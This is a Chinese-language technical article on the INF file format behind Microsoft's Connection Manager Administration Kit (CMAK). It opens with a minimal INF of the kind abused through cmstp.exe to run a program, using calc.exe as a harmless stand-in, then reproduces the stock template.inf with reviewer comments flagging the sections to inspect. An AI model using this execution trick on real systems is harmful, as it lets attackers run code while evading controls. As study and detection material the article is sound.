inf 格式详解

概况

在学习 ATT&CK 战术时,我们经常会看到利用 inf 安装文件进行绕过、从而达到命令执行效果的情况。从网络上(包括微软官方文档)能找到的关于 inf 各 section 的资料并不完整,关于 section 内各条目的资料就更少了。本文简单介绍一种方法,帮助了解 inf 中涉及的 section 及其条目。

常用inf格式

首先我们来看一个攻击者经常利用的 inf 文件:

; The page's own minimal profile INF: a cut-down CMAK profile whose
; [version] lines match the template.inf header further down.
[version]
Signature=$chicago$
AdvancedINF=2.5
; Single-user install section (see [DefaultInstall_SingleUser] in the
; template). Only RegisterOCXs is kept; it names the section below, and
; per the page's prose the line in that section is what gets executed.
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
; Review note: the CMAK template references RegisterOCXSection but never
; defines it. A bare .exe path placed here is the line to flag when
; reviewing a profile INF, and cmstp.exe starting that executable is the
; observable to alert on.
[RegisterOCXSection]
C:\Windows\System32\calc.exe
; Per the author's testing, ServiceName and ShortSvcName must be present;
; AppAct carries the same value as in the template's [Strings].
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

其中的 [DefaultInstall_SingleUser] 节我在微软官网上始终没有找到说明。大致意思可以理解为:安装程序首先处理 DefaultInstall_SingleUser 节,该节中的 RegisterOCXs 条目又引用子节 RegisterOCXSection,从而执行 calc.exe。经我测试,Strings 节中的 ServiceName 和 ShortSvcName 字段是必须存在的。

template.inf 模板文件获取

CMAK 安装后会生成初始化的模板文件,从该文件中我们可以获取所有信息。template.inf 所在路径:c:\program Files\CMAK\support\template.inf

以下为 template.inf 的内容:

;===========================================================================
;
; All of the customizable sections of this file are in the [Strings] section
; at the bottom.
;
; template.inf - CMAK's stock profile-installer template (the page locates
; it under the CMAK support directory). The sections below are what the
; installer processes; [Strings] holds the per-profile values CMAK fills in.
;===========================================================================
[version]
Signature=$chicago$
AdvancedINF=2.5

; Empty placeholder section; nothing else in this file references it.
[CmDial32.Dll]

; -------------------------------------------------------------------
; All User Installs
; -------------------------------------------------------------------
; Entry section for an all-users install. Every key except SmartReboot
; names another section of this file. RegisterOCXSection and the two
; Xnstall.CopyFiles lists are referenced but not defined anywhere in this
; template; presumably CMAK supplies them per profile (not shown here).
[DefaultInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection

; -------------------------------------------------------------------
; Launches the All User postinstall commands
; -------------------------------------------------------------------
; Second pass for the all-users install: only the post-setup command section.
[PostInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPostSetupCommands=RunPostSetupCommandsSection

; -------------------------------------------------------------------
; Single User Installs
; -------------------------------------------------------------------
; Single-user counterpart of [DefaultInstall]; this is the section the
; page's first example keeps (with only RegisterOCXs). Differences from
; the all-users section: per-user destination, the private AddReg list
; and the SingleUser copy list.
; The "AddReg = " spacing differs from the neighbouring keys; this is
; cosmetic only if the parser trims around "=" (not verified here).
[DefaultInstall_SingleUser]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM
AddReg = Xnstall.AddReg.Private
RegisterOCXs=RegisterOCXSection

; -------------------------------------------------------------------
; Launches the Single User postinstall commands
; -------------------------------------------------------------------
; Single-user post-setup pass, paired with [DefaultInstall_SingleUser].
[PostInstall_Single]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPostSetupCommands=RunPostSetupCommandsSection

; -------------------------------------------------------------------
; This file section sets up the desktop icon GUID and is thus
; only needed on legacy systems.
; -------------------------------------------------------------------
; Registry-only section: writes the CLSID/namespace entries listed in
; [Xnstall.AddReg.DesktopIcon]. Xnstall.AddReg.Icon is referenced here
; but not defined in this template.
[Xnstall_Legacy]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon

; These sections are kept for legacy compatibility but are no longer used.
; Both are intentionally empty; nothing in this file references them.
[Xnstall_Private]
[Xnstall_AllUser]

; -------------------------------------------------------------------
; Section used to uninstall Private user profiles
; -------------------------------------------------------------------
; Single-user uninstall. Runs the pre/post uninstall command sections
; around the file, registry and directory removals; the two prompt
; sections supply the YESNO confirmation shown to the user.
[Remove_Private]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUnInstDestSectionPrivate
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.Private
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection

; -------------------------------------------------------------------
; Section used to uninstall All User profiles
; -------------------------------------------------------------------
; All-users uninstall; same shape as [Remove_Private] but with the
; HKLM-side destination and DelReg lists. Remove.DelFiles and
; Remove.DelFiles.ICM appear only in [DestinationDirs], not as sections.
[Remove]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUninstDestSectionAllUsers
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.AllUser
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection

; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or
; after the profile is installed.
;
; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run
; commands before or after the profile is uninstalled.
;
; An example command line is:
; Myprogram.exe /<switches> <options>
;
; Review note: all four sections are empty in the stock template. In a
; profile INF every line placed here is a command line the installer
; runs, so a populated Run*Commands section (like a RegisterOCXs entry
; naming an .exe) is the part of a profile to inspect first.

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install

[RunPostSetupCommandsSection]
;Commands here will be run After setup finishes

[RunPreUnInstCommandsSection]
;Commands here will be run before Uninstall Begins

[RunPostUnInstCommandsSection]
;Commands here will be run after Uninstall Finishes

; -------------------------------------------------------------------
; These are the registry entries for installation.
; -------------------------------------------------------------------
; Each line appears to be: root key, subkey, value name, flags, data.
; %...% tokens come from [Strings]; %49000%/%49001% are the directory IDs
; defined by the CustomDestination sections further down.
[Xnstall.AddReg.DesktopIcon]
"HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,,"%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00"
; Please make sure the following three commands are alphabetized by the %Open%, %Delete%,
; and %Settings% entries defined in the Strings section
; Review note: these shell verbs persist the profile's own cmmgr32.exe and
; cmstp.exe /u command lines under HKCR; they are where a profile's
; launch commands survive after installation.
; the Connect Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%"
; the Delete Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%"
; the Properties Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%"

; All-users registration: the UninstallDir value written here is what
; [XConnMgrLDIDSectionAllUsers] reads back at uninstall time.
[Xnstall.AddReg.AllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", "%49001%"
"HKLM", "%AppAct%\Mappings","%ServiceName%","","%49001%\%ShortSvcName%.cmp"

; Intentionally empty; the single-user mapping moved into code (the
; commented-out line references %PathFromProfileDir%, which [Strings]
; no longer defines).
[Xnstall.AddReg.Private]
; Single User Mappings is now written in code.
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp"

; -------------------------------------------------------------------
; These are the registry settings which
; are deleted during uninstall.
; -------------------------------------------------------------------
; DelReg lines give root key and subkey, optionally a value name. They
; mirror the keys written by the AddReg sections above plus the CMAK
; UserInfo/SingleUserInfo keys, which no section in this file writes.
[Remove.DelReg.AllUser]
"HKLM", "%AppAct%\%ServiceName%"
"HKLM", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\UserInfo\%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"

; HKCU-side counterpart used by [Remove_Private].
[Remove.DelReg.Private]
"HKCU", "%AppAct%\%ServiceName%"
"HKCU", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\SingleUserInfo\%ServiceName%"
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"

; Directory removed by DelDirs in both uninstall sections.
[CleanDir]
%49001%\%ShortSvcName%

; -------------------------------------------------------------------
; These are the directory specifications.
; -------------------------------------------------------------------
; CustomDestination sections map directory IDs 49000/49001 to an LDID
; section that reads the install path from the registry. The trailing
; number differs between install (7) and uninstall (5); its meaning is
; not documented on this page.

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[CustInstDestSectionSingleUsers]
49000,49001=SingleUser_LDIDSection, 7

[CustUninstDestSectionAllUsers]
49000,49001=XConnMgrLDIDSectionAllUsers, 5

[CustUnInstDestSectionPrivate]
49000,49001=XConnMgrLDIDSectionPrivate, 5

; LDID sections: root key, subkey, value name, then what look like an
; error string and a default (presumably; not verified here). The
; install-time ones read ProfileInstallPath; the uninstall ones read
; UninstallDir. For all-users that value is written by
; [Xnstall.AddReg.AllUsers]; no section in this template writes the
; HKCU UninstallDir that [XConnMgrLDIDSectionPrivate] reads.
[SingleUser_LDIDSection]
"HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", ""

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[XConnMgrLDIDSectionAllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""

[XConnMgrLDIDSectionPrivate]
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""

; Where each CopyFiles/DelFiles list lands: directory ID, optional
; subdirectory named after the profile.
[DestinationDirs]
Xnstall.CopyFiles=49001, %ShortSvcName%
Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName%
Xnstall.CopyFiles.ICM=49001
Remove.DelFiles=49001, %ShortSvcName%
Remove.DelFiles.ICM=49001

; Single source disk entry (ID 55) with empty description and tag fields.
[SourceDisksNames]
55=, , 0

; -------------------------------------------------------------------
; These are the Prompt Sections
; -------------------------------------------------------------------
; Yes/No confirmation shown before uninstall; text and title come from
; the CMAK-populated [Strings] values.

[RemoveBeginPromptSection]
Prompt=%BeginPrompt%
ButtonType=YESNO
Title=%UninstallAppTitle%

; Message shown after uninstall completes.
[RemoveEndPromptSection]
Prompt=%EndPrompt%


[Strings]
; -------------------------------------------------------------------
; These are the non localizable strings...
; -------------------------------------------------------------------
; KEY_RENAME is defined but not referenced anywhere else in this template.
KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles"
; Registry base used by most AddReg/DelReg/LDID lines above.
AppAct = "SOFTWARE\Microsoft\Connection Manager"

; -------------------------------------------------------------------
; These are the localizable strings...
; -------------------------------------------------------------------
UnexpectedError = "An unexpected error occurred.  Please reboot and try the installation again."

; When you localize these commands (they are the commands for the Desktop Icon on legacy
; platforms) you must make sure to re-alphabetize the Registry add calls above.  Win95
; shows the menus in the order they were added and doesn't alphabetize them for you.
Settings = "P&roperties"
Open = "C&onnect"
Delete = "&Delete"

; -------------------------------------------------------------------
; The following strings are set by the Connection Manager Administration Kit
; Do not change any of the following strings
; -------------------------------------------------------------------
; Left empty in the template; CMAK fills them per profile. The page's
; example supplies only ServiceName and ShortSvcName (plus AppAct) and
; reports those two as required.
ServiceName=""
ShortSvcName=""
DesktopGUID=""
UninstallAppTitle=""
DesktopIcon=""
PhonebookPath=""
BeginPrompt=""
EndPrompt=""
DisplayLCID=""

; Bookkeeping sections, presumably consumed by CMAK itself rather than by
; the installer (inferred from the section names; not verified here).
[CMAK Status]
InfVersion=5

[Extra Files]

[Merge Profiles]

根据这个模板文件,我们大致了解了常用的节及其条目。注意调用 cmstp.exe 时,要根据单用户安装和全部用户安装的不同,选择相应的参数值。

参考文件

CMAK安装:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc771679(v%3dws.10)
